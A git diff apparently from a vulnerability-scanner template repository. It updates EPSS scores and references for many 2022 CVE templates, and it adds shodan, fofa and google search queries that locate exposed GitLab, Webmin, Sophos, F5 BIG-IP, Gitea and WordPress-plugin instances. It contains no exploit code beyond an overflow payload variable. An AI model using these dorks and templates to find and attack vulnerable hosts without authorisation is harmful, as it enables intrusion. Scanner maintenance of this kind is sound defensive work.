b/http/cves/2022/CVE-2022-0735.yaml @@ -21,13 +21,15 @@ info: cve-id: CVE-2022-0735 cwe-id: CWE-863 epss-score: 0.03278 - epss-percentile: 0.90347 + epss-percentile: 0.91282 cpe: cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:* metadata: max-request: 1 vendor: gitlab product: gitlab shodan-query: http.title:"GitLab" + fofa-query: title="gitlab" + google-query: intitle:"gitlab" tags: cve,cve2022,gitlab http: diff --git a/http/cves/2022/CVE-2022-0747.yaml b/http/cves/2022/CVE-2022-0747.yaml index 4d0a4c9d12..615f112b9e 100644 --- a/http/cves/2022/CVE-2022-0747.yaml +++ b/http/cves/2022/CVE-2022-0747.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2022-0747 cwe-id: CWE-89 epss-score: 0.02705 - epss-percentile: 0.90254 + epss-percentile: 0.90483 cpe: cpe:2.3:a:quantumcloud:infographic_maker:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0769.yaml b/http/cves/2022/CVE-2022-0769.yaml index 946b65bd33..1d069ca3aa 100644 --- a/http/cves/2022/CVE-2022-0769.yaml +++ b/http/cves/2022/CVE-2022-0769.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-0769 cwe-id: CWE-89 - epss-score: 0.02977 - epss-percentile: 0.90654 + epss-score: 0.02367 + epss-percentile: 0.89814 cpe: cpe:2.3:a:usersultra:users_ultra:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0776.yaml b/http/cves/2022/CVE-2022-0776.yaml index a37ad7c9da..931bfa16ab 100644 --- a/http/cves/2022/CVE-2022-0776.yaml +++ b/http/cves/2022/CVE-2022-0776.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2022-0776 cwe-id: CWE-79 epss-score: 0.001 - epss-percentile: 0.40139 + epss-percentile: 0.41295 cpe: cpe:2.3:a:revealjs:reveal.js:*:*:*:*:*:node.js:*:* metadata: vendor: revealjs diff --git a/http/cves/2022/CVE-2022-0781.yaml b/http/cves/2022/CVE-2022-0781.yaml index 8709b871e8..9d9eb411b4 100644 --- a/http/cves/2022/CVE-2022-0781.yaml +++ b/http/cves/2022/CVE-2022-0781.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-0781 cwe-id: CWE-89 - epss-score: 0.01147 - epss-percentile: 0.84479 + epss-score: 0.01278 + epss-percentile: 0.85709 cpe: cpe:2.3:a:nirweb:nirweb_support:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0786.yaml b/http/cves/2022/CVE-2022-0786.yaml index 4668acfa74..3073a46d3b 100644 --- a/http/cves/2022/CVE-2022-0786.yaml +++ b/http/cves/2022/CVE-2022-0786.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-0786 cwe-id: CWE-89 - epss-score: 0.03633 - epss-percentile: 0.91467 + epss-score: 0.04043 + epss-percentile: 0.92087 cpe: cpe:2.3:a:iqonic:kivicare:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0787.yaml b/http/cves/2022/CVE-2022-0787.yaml index 4ec0f01939..168f458082 100644 --- a/http/cves/2022/CVE-2022-0787.yaml +++ b/http/cves/2022/CVE-2022-0787.yaml @@ -17,8 +17,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-0787 cwe-id: CWE-89 - epss-score: 0.04043 - epss-percentile: 0.91894 + epss-score: 0.04032 + epss-percentile: 0.92073 cpe: cpe:2.3:a:limit_login_attempts_project:limit_login_attempts:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0814.yaml b/http/cves/2022/CVE-2022-0814.yaml index 14840b8a0e..948e02ad78 100644 --- a/http/cves/2022/CVE-2022-0814.yaml +++ b/http/cves/2022/CVE-2022-0814.yaml @@ -27,6 +27,8 @@ info: product: ubigeo_de_peru_para_woocommerce framework: wordpress publicwww-query: "/wp-content/plugins/ubigeo-peru/" + shodan-query: http.html:/wp-content/plugins/ubigeo-peru/ + fofa-query: body=/wp-content/plugins/ubigeo-peru/ tags: cve,cve2022,wordpress,wpscan,wp-plugin,sqli,ubigeo-peru,unauth,ubigeo_de_peru_para_woocommerce_project http: diff --git a/http/cves/2022/CVE-2022-0817.yaml b/http/cves/2022/CVE-2022-0817.yaml index e75bdc7c5f..262e62b79d 100644 --- a/http/cves/2022/CVE-2022-0817.yaml +++ b/http/cves/2022/CVE-2022-0817.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-0817 cwe-id: CWE-89 - epss-score: 0.03633 - epss-percentile: 0.91467 + epss-score: 0.04032 + epss-percentile: 0.92073 cpe: cpe:2.3:a:badgeos:badgeos:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0824.yaml b/http/cves/2022/CVE-2022-0824.yaml index afa8ea4368..ae695e1fd7 100644 --- a/http/cves/2022/CVE-2022-0824.yaml +++ b/http/cves/2022/CVE-2022-0824.yaml @@ -27,6 +27,9 @@ info: max-request: 2 vendor: webmin product: webmin + shodan-query: http.title:"webmin" + fofa-query: title="webmin" + google-query: intitle:"webmin" tags: cve,cve2022,rce,oss,huntr,webmin,authenticated http: diff --git a/http/cves/2022/CVE-2022-0826.yaml b/http/cves/2022/CVE-2022-0826.yaml index aa257071fd..7e7f384310 100644 --- a/http/cves/2022/CVE-2022-0826.yaml +++ b/http/cves/2022/CVE-2022-0826.yaml @@ -15,13 +15,14 @@ info: - https://wordpress.org/plugins/wp-video-gallery-free/ - https://nvd.nist.gov/vuln/detail/CVE-2022-0826 - https://github.com/ARPSyndicate/kenzer-templates + - https://github.com/cyllective/CVEs classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-0826 cwe-id: CWE-89 - epss-score: 0.05057 - epss-percentile: 0.92143 + epss-score: 0.04032 + epss-percentile: 0.92073 cpe: cpe:2.3:a:wp-video-gallery-free_project:wp-video-gallery-free:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0827.yaml b/http/cves/2022/CVE-2022-0827.yaml index 53e37f1b72..3763e4c54c 100644 --- a/http/cves/2022/CVE-2022-0827.yaml +++ b/http/cves/2022/CVE-2022-0827.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-0827 cwe-id: CWE-89 - epss-score: 0.03633 - epss-percentile: 0.91467 + epss-score: 0.04043 + epss-percentile: 0.92087 cpe: cpe:2.3:a:presspage:bestbooks:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0846.yaml b/http/cves/2022/CVE-2022-0846.yaml index 6a02a3fcdb..27deefaff5 100644 --- a/http/cves/2022/CVE-2022-0846.yaml +++ b/http/cves/2022/CVE-2022-0846.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-0846 cwe-id: CWE-89 - epss-score: 0.03633 - epss-percentile: 0.90796 + epss-score: 0.04032 + epss-percentile: 0.92073 cpe: cpe:2.3:a:speakout\!_email_petitions_project:speakout\!_email_petitions:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0864.yaml b/http/cves/2022/CVE-2022-0864.yaml index 30efd2cb82..e932178228 100644 --- a/http/cves/2022/CVE-2022-0864.yaml +++ b/http/cves/2022/CVE-2022-0864.yaml @@ -29,7 +29,7 @@ info: vendor: updraftplus product: updraftplus framework: wordpress - tags: cve,cve2022,xss,authenticated,updraftplus,wpscan,wp-plugin,wp,wordpress,updraftplus + tags: wpscan,cve,cve2022,xss,authenticated,updraftplus,wp-plugin,wp,wordpress http: - raw: diff --git a/http/cves/2022/CVE-2022-0869.yaml b/http/cves/2022/CVE-2022-0869.yaml index d3c373eaf1..180e5f5564 100644 --- a/http/cves/2022/CVE-2022-0869.yaml +++ b/http/cves/2022/CVE-2022-0869.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-0869 cwe-id: CWE-601 epss-score: 0.00115 - epss-percentile: 0.4417 + epss-percentile: 0.45018 cpe: cpe:2.3:a:spirit-project:spirit:*:*:*:*:*:*:*:* metadata: max-request: 4 diff --git a/http/cves/2022/CVE-2022-0870.yaml b/http/cves/2022/CVE-2022-0870.yaml index c7fb438fed..d01307aa57 100644 --- a/http/cves/2022/CVE-2022-0870.yaml +++ b/http/cves/2022/CVE-2022-0870.yaml @@ -28,6 +28,9 @@ info: max-request: 4 vendor: gogs product: gogs + google-query: intitle:"sign in - gogs" + shodan-query: cpe:"cpe:2.3:a:gogs:gogs" + fofa-query: title="sign in - gogs" tags: cve,cve2022,ssrf,gogs,authenticated,huntr http: diff --git a/http/cves/2022/CVE-2022-0899.yaml b/http/cves/2022/CVE-2022-0899.yaml index 4a3c0ebcce..feaf9c8580 100644 --- a/http/cves/2022/CVE-2022-0899.yaml +++ b/http/cves/2022/CVE-2022-0899.yaml @@ -23,6 +23,7 @@ info: vendor: draftpress product: header_footer_code_manager framework: wordpress + google-query: inurl:"/wp-content/plugins/wp-custom-pages/" tags: cve2022,cve,wpscan,wp,wp-plugin,wordpress,xss,authenticated,draftpress http: diff --git a/http/cves/2022/CVE-2022-0928.yaml b/http/cves/2022/CVE-2022-0928.yaml index 2c2122562b..1343c036b1 100644 --- a/http/cves/2022/CVE-2022-0928.yaml +++ b/http/cves/2022/CVE-2022-0928.yaml @@ -14,19 +14,23 @@ info: - https://huntr.dev/bounties/085aafdd-ba50-44c7-9650-fa573da29bcd - https://github.com/microweber/microweber/commit/fc9137c031f7edec5f50d73b300919fb519c924a - https://nvd.nist.gov/vuln/detail/CVE-2022-0928 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N cvss-score: 5.4 cve-id: CVE-2022-0928 cwe-id: CWE-79 epss-score: 0.00144 - epss-percentile: 0.50156 + epss-percentile: 0.50194 cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:* metadata: verified: true max-request: 3 vendor: microweber product: microweber + shodan-query: http.favicon.hash:780351152 + fofa-query: body="microweber" tags: cve2022,cve,authenticated,huntr,xss,microweber,cms http: diff --git a/http/cves/2022/CVE-2022-0949.yaml b/http/cves/2022/CVE-2022-0949.yaml index e0491bf17d..b782b6673e 100644 --- a/http/cves/2022/CVE-2022-0949.yaml +++ b/http/cves/2022/CVE-2022-0949.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-0949 cwe-id: CWE-89 - epss-score: 0.04043 - epss-percentile: 0.91894 + epss-score: 0.04032 + epss-percentile: 0.92073 cpe: cpe:2.3:a:stopbadbots:block_and_stop_bad_bots:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0954.yaml b/http/cves/2022/CVE-2022-0954.yaml index 5eeef53133..f5d82c6ace 100644 --- a/http/cves/2022/CVE-2022-0954.yaml +++ b/http/cves/2022/CVE-2022-0954.yaml @@ -22,13 +22,15 @@ info: cve-id: CVE-2022-0954 cwe-id: CWE-79 epss-score: 0.00144 - epss-percentile: 0.50222 + epss-percentile: 0.50194 cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:* metadata: verified: true max-request: 3 vendor: microweber product: microweber + shodan-query: http.favicon.hash:780351152 + fofa-query: body="microweber" tags: cve2022,cve,xss,microweber,huntr http: diff --git a/http/cves/2022/CVE-2022-0963.yaml b/http/cves/2022/CVE-2022-0963.yaml index e2a7395a63..8a414bcd31 100644 --- a/http/cves/2022/CVE-2022-0963.yaml +++ b/http/cves/2022/CVE-2022-0963.yaml @@ -20,13 +20,15 @@ info: cve-id: CVE-2022-0963 cwe-id: CWE-79 epss-score: 0.00144 - epss-percentile: 0.50156 + epss-percentile: 0.50194 cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:* metadata: verified: true max-request: 3 vendor: microweber product: microweber + shodan-query: http.favicon.hash:780351152 + fofa-query: body="microweber" tags: cve,cve2022,xss,microweber,cms,authenticated,huntr,intrusive http: diff --git a/http/cves/2022/CVE-2022-0968.yaml b/http/cves/2022/CVE-2022-0968.yaml index 952a5dd550..e1cd0ce752 100644 --- a/http/cves/2022/CVE-2022-0968.yaml +++ b/http/cves/2022/CVE-2022-0968.yaml @@ -27,6 +27,8 @@ info: max-request: 3 vendor: microweber product: microweber + shodan-query: http.favicon.hash:780351152 + fofa-query: body="microweber" tags: cve,cve2022,overflow,microweber,cms,huntr variables: payload: '{{repeat("A", 600)}}' diff --git a/http/cves/2022/CVE-2022-1007.yaml b/http/cves/2022/CVE-2022-1007.yaml index fe8e001610..10fe21c738 100644 --- a/http/cves/2022/CVE-2022-1007.yaml +++ b/http/cves/2022/CVE-2022-1007.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2022-1007 cwe-id: CWE-79 epss-score: 0.001 - epss-percentile: 0.40139 + epss-percentile: 0.41295 cpe: cpe:2.3:a:elbtide:advanced_booking_calendar:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-1013.yaml b/http/cves/2022/CVE-2022-1013.yaml index 4d896dbd25..65b0a76af7 100644 --- a/http/cves/2022/CVE-2022-1013.yaml +++ b/http/cves/2022/CVE-2022-1013.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-1013 cwe-id: CWE-89 - epss-score: 0.02031 - epss-percentile: 0.88685 + epss-score: 0.0161 + epss-percentile: 0.87425 cpe: cpe:2.3:a:ays-pro:personal_dictionary:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-1040.yaml b/http/cves/2022/CVE-2022-1040.yaml index e304c7bb7c..1a32971ded 100644 --- a/http/cves/2022/CVE-2022-1040.yaml +++ b/http/cves/2022/CVE-2022-1040.yaml @@ -30,6 +30,8 @@ info: vendor: sophos product: sfos shodan-query: http.title:"Sophos" + fofa-query: title="sophos" + google-query: intitle:"sophos" tags: cve,cve2022,sophos,firewall,auth-bypass,rce,kev http: diff --git a/http/cves/2022/CVE-2022-1054.yaml b/http/cves/2022/CVE-2022-1054.yaml index dbbbdd83c4..b2992c6265 100644 --- a/http/cves/2022/CVE-2022-1054.yaml +++ b/http/cves/2022/CVE-2022-1054.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2022-1054 cwe-id: CWE-862 epss-score: 0.00292 - epss-percentile: 0.68538 + epss-percentile: 0.69101 cpe: cpe:2.3:a:wpchill:rsvp_and_event_management:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-1057.yaml b/http/cves/2022/CVE-2022-1057.yaml index e9688f5fbb..015a580b7a 100644 --- a/http/cves/2022/CVE-2022-1057.yaml +++ b/http/cves/2022/CVE-2022-1057.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-1057 cwe-id: CWE-89 - epss-score: 0.05057 - epss-percentile: 0.92729 + epss-score: 0.03633 + epss-percentile: 0.9168 cpe: cpe:2.3:a:varktech:pricing_deals_for_woocommerce:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-1058.yaml b/http/cves/2022/CVE-2022-1058.yaml index 9444a2cfef..a35a6bb80a 100644 --- a/http/cves/2022/CVE-2022-1058.yaml +++ b/http/cves/2022/CVE-2022-1058.yaml @@ -28,6 +28,8 @@ info: vendor: gitea product: gitea shodan-query: title:"Gitea" + fofa-query: body="powered by gitea version" + google-query: intitle:"gitea" tags: cve,cve2022,huntr,open-redirect,gitea http: diff --git a/http/cves/2022/CVE-2022-1119.yaml b/http/cves/2022/CVE-2022-1119.yaml index 1deaf81022..a8263c468e 100644 --- a/http/cves/2022/CVE-2022-1119.yaml +++ b/http/cves/2022/CVE-2022-1119.yaml @@ -21,8 +21,8 @@ info: cvss-score: 7.5 cve-id: CVE-2022-1119 cwe-id: CWE-22 - epss-score: 0.42222 - epss-percentile: 0.97228 + epss-score: 0.41577 + epss-percentile: 0.97306 cpe: cpe:2.3:a:simplefilelist:simple-file-list:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-1162.yaml b/http/cves/2022/CVE-2022-1162.yaml index 6ad9ef2ab1..093c630c29 100644 --- a/http/cves/2022/CVE-2022-1162.yaml +++ b/http/cves/2022/CVE-2022-1162.yaml @@ -27,6 +27,8 @@ info: vendor: gitlab product: gitlab shodan-query: http.title:"GitLab" + fofa-query: title="gitlab" + google-query: intitle:"gitlab" tags: cve,cve2022,gitlab,packetstorm http: diff --git a/http/cves/2022/CVE-2022-1170.yaml b/http/cves/2022/CVE-2022-1170.yaml index 70083869b4..6bff99bdc1 100644 --- a/http/cves/2022/CVE-2022-1170.yaml +++ b/http/cves/2022/CVE-2022-1170.yaml @@ -25,6 +25,8 @@ info: product: jobmonster framework: wordpress publicwww-query: "/wp-content/themes/noo-jobmonster" + shodan-query: http.html:/wp-content/themes/noo-jobmonster + fofa-query: body=/wp-content/themes/noo-jobmonster tags: cve,cve2022,wpscan,wp,wp-theme,wordpress,xss,jobmonster,nootheme http: diff --git a/http/cves/2022/CVE-2022-1221.yaml b/http/cves/2022/CVE-2022-1221.yaml index 63d246697b..e93c59929b 100644 --- a/http/cves/2022/CVE-2022-1221.yaml +++ b/http/cves/2022/CVE-2022-1221.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2022-1221 cwe-id: CWE-79 epss-score: 0.00106 - epss-percentile: 0.42899 + epss-percentile: 0.43227 cpe: cpe:2.3:a:gwyn\'s_imagemap_selector_project:gwyn\'s_imagemap_selector:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-1329.yaml b/http/cves/2022/CVE-2022-1329.yaml index 17873ed3b5..d3bc4fa709 100644 --- a/http/cves/2022/CVE-2022-1329.yaml +++ b/http/cves/2022/CVE-2022-1329.yaml @@ -19,9 +19,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2022-1329 - cwe-id: CWE-862,CWE-434 - epss-score: 0.96079 - epss-percentile: 0.99457 + cwe-id: CWE-434,CWE-862 + epss-score: 0.96342 + epss-percentile: 0.9955 cpe: cpe:2.3:a:elementor:website_builder:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-1386.yaml b/http/cves/2022/CVE-2022-1386.yaml index e4dc9c8029..c92833a58d 100644 --- a/http/cves/2022/CVE-2022-1386.yaml +++ b/http/cves/2022/CVE-2022-1386.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-1386 cwe-id: CWE-918 - epss-score: 0.32824 - epss-percentile: 0.96921 + epss-score: 0.26067 + epss-percentile: 0.96717 cpe: cpe:2.3:a:fusion_builder_project:fusion_builder:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2022/CVE-2022-1388.yaml b/http/cves/2022/CVE-2022-1388.yaml index 6557561b7e..6921142fea 100644 --- a/http/cves/2022/CVE-2022-1388.yaml +++ b/http/cves/2022/CVE-2022-1388.yaml @@ -30,6 +30,8 @@ info: vendor: f5 product: big-ip_access_policy_manager shodan-query: http.title:"BIG-IP®-+Redirect" +"Server" + fofa-query: title="big-ip®-+redirect" +"server" + google-query: intitle:"big-ip®-+redirect" +"server" tags: cve,cve2022,f5,bigip,rce,mirai,kev variables: auth: "admin:" diff --git a/http/cves/2022/CVE-2022-1391.yaml b/http/cves/2022/CVE-2022-1391.yaml index 59c36a4eb5..7a633ba8a2 100644 --- a/http/cves/2022/CVE-2022-1391.yaml +++ b/http/cves/2022/CVE-2022-1391.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2022-1391 cwe-id: CWE-22 epss-score: 0.03037 - epss-percentile: 0.9075 + epss-percentile: 0.90957 cpe: cpe:2.3:a:kanev:cab_fare_calculator:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-1392.yaml b/http/cves/2022/CVE-2022-1392.yaml index 81f38e8525..aa3e492f0a 100644 --- a/http/cves/2022/CVE-2022-1392.yaml +++ b/http/cves/2022/CVE-2022-1392.yaml @@ -13,13 +13,15 @@ info: - https://wpscan.com/vulnerability/fe3da8c1-ae21-4b70-b3f5-a7d014aa3815 - https://packetstormsecurity.com/files/166534/ - https://nvd.nist.gov/vuln/detail/CVE-2022-1392 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2022-1392 cwe-id: CWE-22 - epss-score: 0.01867 - epss-percentile: 0.87073 + epss-score: 0.01514 + epss-percentile: 0.86976 cpe: cpe:2.3:a:commoninja:videos_sync_pdf:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-1439.yaml b/http/cves/2022/CVE-2022-1439.yaml index 132e36833a..78ba7bb25a 100644 --- a/http/cves/2022/CVE-2022-1439.yaml +++ b/http/cves/2022/CVE-2022-1439.yaml @@ -21,13 +21,14 @@ info: cve-id: CVE-2022-1439 cwe-id: CWE-79 epss-score: 0.001 - epss-percentile: 0.40139 + epss-percentile: 0.41295 cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: microweber product: microweber shodan-query: http.favicon.hash:780351152 + fofa-query: body="microweber" tags: cve,cve2022,microweber,xss,huntr http: diff --git a/http/cves/2022/CVE-2022-1442.yaml b/http/cves/2022/CVE-2022-1442.yaml index 5aad6a98d0..787366549a 100644 --- a/http/cves/2022/CVE-2022-1442.yaml +++ b/http/cves/2022/CVE-2022-1442.yaml @@ -21,8 +21,8 @@ info: cvss-score: 7.5 cve-id: CVE-2022-1442 cwe-id: CWE-862 - epss-score: 0.04338 - epss-percentile: 0.91514 + epss-score: 0.04148 + epss-percentile: 0.92177 cpe: cpe:2.3:a:wpmet:metform_elementor_contact_form_builder:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-1574.yaml b/http/cves/2022/CVE-2022-1574.yaml index 6aa5f12bc3..9df7a7a7ab 100644 --- a/http/cves/2022/CVE-2022-1574.yaml +++ b/http/cves/2022/CVE-2022-1574.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-1574 cwe-id: CWE-352 - epss-score: 0.03019 - epss-percentile: 0.90712 + epss-score: 0.05961 + epss-percentile: 0.93455 cpe: cpe:2.3:a:html2wp_project:html2wp:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-1580.yaml b/http/cves/2022/CVE-2022-1580.yaml index bb9095f37a..82a6da85c0 100644 --- a/http/cves/2022/CVE-2022-1580.yaml +++ b/http/cves/2022/CVE-2022-1580.yaml @@ -15,8 +15,8 @@ info: cvss-score: 4.3 cve-id: CVE-2022-1580 cwe-id: CWE-639 - epss-score: 0.00058 - epss-percentile: 0.24444 + epss-score: 0.00069 + epss-percentile: 0.29862 cpe: cpe:2.3:a:freehtmldesigns:site_offline:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -26,7 +26,6 @@ info: framework: wordpress publicwww-query: "/wp-content/plugins/site-offline/" tags: cve,cve2022,wpscan,site-offline,wordpress,wp-plugin,wp - flow: http(1) && http(2) http: diff --git a/http/cves/2022/CVE-2022-1597.yaml b/http/cves/2022/CVE-2022-1597.yaml index 484e845f2c..e6049f2e36 100644 --- a/http/cves/2022/CVE-2022-1597.yaml +++ b/http/cves/2022/CVE-2022-1597.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2022-1597 cwe-id: CWE-79 epss-score: 0.00188 - epss-percentile: 0.55258 + epss-percentile: 0.56053 cpe: cpe:2.3:a:2code:wpqa_builder:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-1598.yaml b/http/cves/2022/CVE-2022-1598.yaml index a01f8dc4ee..53c881e95d 100644 --- a/http/cves/2022/CVE-2022-1598.yaml +++ b/http/cves/2022/CVE-2022-1598.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2022-1598 cwe-id: CWE-306 epss-score: 0.01171 - epss-percentile: 0.84672 + epss-percentile: 0.84938 cpe: cpe:2.3:a:2code:wpqa_builder:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-1713.yaml b/http/cves/2022/CVE-2022-1713.yaml index 047d066d04..eb724b8755 100644 --- a/http/cves/2022/CVE-2022-1713.yaml +++ b/http/cves/2022/CVE-2022-1713.yaml @@ -20,8 +20,8 @@ info: cvss-score: 7.5 cve-id: CVE-2022-1713 cwe-id: CWE-918 - epss-score: 0.0258 - epss-percentile: 0.90003 + epss-score: 0.02483 + epss-percentile: 0.90072 cpe: cpe:2.3:a:diagrams:drawio:*:*:*:*:*:*:*:* metadata: verified: true @@ -29,6 +29,8 @@ info: vendor: diagrams product: drawio shodan-query: http.title:"Flowchart Maker" + fofa-query: title="flowchart maker" + google-query: intitle:"flowchart maker" tags: cve,cve2022,drawio,ssrf,oss,huntr,diagrams http: diff --git a/http/cves/2022/CVE-2022-1756.yaml b/http/cves/2022/CVE-2022-1756.yaml index ef39f7d039..144692e404 100644 --- a/http/cves/2022/CVE-2022-1756.yaml +++ b/http/cves/2022/CVE-2022-1756.yaml @@ -29,6 +29,8 @@ info: product: newsletter framework: wordpress publicwww-query: "/wp-content/plugins/newsletter/" + shodan-query: http.html:/wp-content/plugins/newsletter/ + fofa-query: body=/wp-content/plugins/newsletter/ tags: cve,cve2022,wpscan,newsletter,xss,authenticated,thenewsletterplugin,wordpress http: diff --git a/http/cves/2022/CVE-2022-1768.yaml b/http/cves/2022/CVE-2022-1768.yaml index 94f02f86c3..8a1ebf7e0f 100644 --- a/http/cves/2022/CVE-2022-1768.yaml +++ b/http/cves/2022/CVE-2022-1768.yaml @@ -21,8 +21,8 @@ info: cvss-score: 7.5 cve-id: CVE-2022-1768 cwe-id: CWE-89 - epss-score: 0.13776 - epss-percentile: 0.95151 + epss-score: 0.10537 + epss-percentile: 0.95006 cpe: cpe:2.3:a:carrcommunications:rsvpmaker:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-1815.yaml b/http/cves/2022/CVE-2022-1815.yaml index 4a3bd44221..3c938a5fbe 100644 --- a/http/cves/2022/CVE-2022-1815.yaml +++ b/http/cves/2022/CVE-2022-1815.yaml @@ -29,6 +29,9 @@ info: max-request: 1 vendor: diagrams product: drawio + shodan-query: http.title:"flowchart maker" + fofa-query: title="flowchart maker" + google-query: intitle:"flowchart maker" tags: cve,cve2022,huntr,drawio,ssrf,oast,oss,jgraph,diagrams http: diff --git a/http/cves/2022/CVE-2022-1903.yaml b/http/cves/2022/CVE-2022-1903.yaml index 2e5f352f06..c1cad3ec05 100644 --- a/http/cves/2022/CVE-2022-1903.yaml +++ b/http/cves/2022/CVE-2022-1903.yaml @@ -20,8 +20,8 @@ info: cvss-score: 8.1 cve-id: CVE-2022-1903 cwe-id: CWE-862 - epss-score: 0.62377 - epss-percentile: 0.97556 + epss-score: 0.70044 + epss-percentile: 0.98014 cpe: cpe:2.3:a:armemberplugin:armember:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-1937.yaml b/http/cves/2022/CVE-2022-1937.yaml index d258094795..44b752cc6c 100644 --- a/http/cves/2022/CVE-2022-1937.yaml +++ b/http/cves/2022/CVE-2022-1937.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2022-1937 cwe-id: CWE-79 epss-score: 0.00086 - epss-percentile: 0.35299 + epss-percentile: 0.36517 cpe: cpe:2.3:a:awin:awin_data_feed:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-1946.yaml b/http/cves/2022/CVE-2022-1946.yaml index 93582af860..11f97c7aca 100644 --- a/http/cves/2022/CVE-2022-1946.yaml +++ b/http/cves/2022/CVE-2022-1946.yaml @@ -13,13 +13,15 @@ info: - https://wpscan.com/vulnerability/0903920c-be2e-4515-901f-87253eb30940 - https://wordpress.org/plugins/gallery-album - https://nvd.nist.gov/vuln/detail/CVE-2022-1946 + - https://github.com/ARPSyndicate/kenzer-templates + - https://github.com/cyllective/CVEs classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-1946 cwe-id: CWE-79 - epss-score: 0.00099 - epss-percentile: 0.40609 + epss-score: 0.00086 + epss-percentile: 0.36517 cpe: cpe:2.3:a:wpdevart:gallery:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-2034.yaml b/http/cves/2022/CVE-2022-2034.yaml index 923972b6fa..61bd27c2a9 100644 --- a/http/cves/2022/CVE-2022-2034.yaml +++ b/http/cves/2022/CVE-2022-2034.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-2034 cwe-id: CWE-639 epss-score: 0.00506 - epss-percentile: 0.76026 + epss-percentile: 0.76436 cpe: 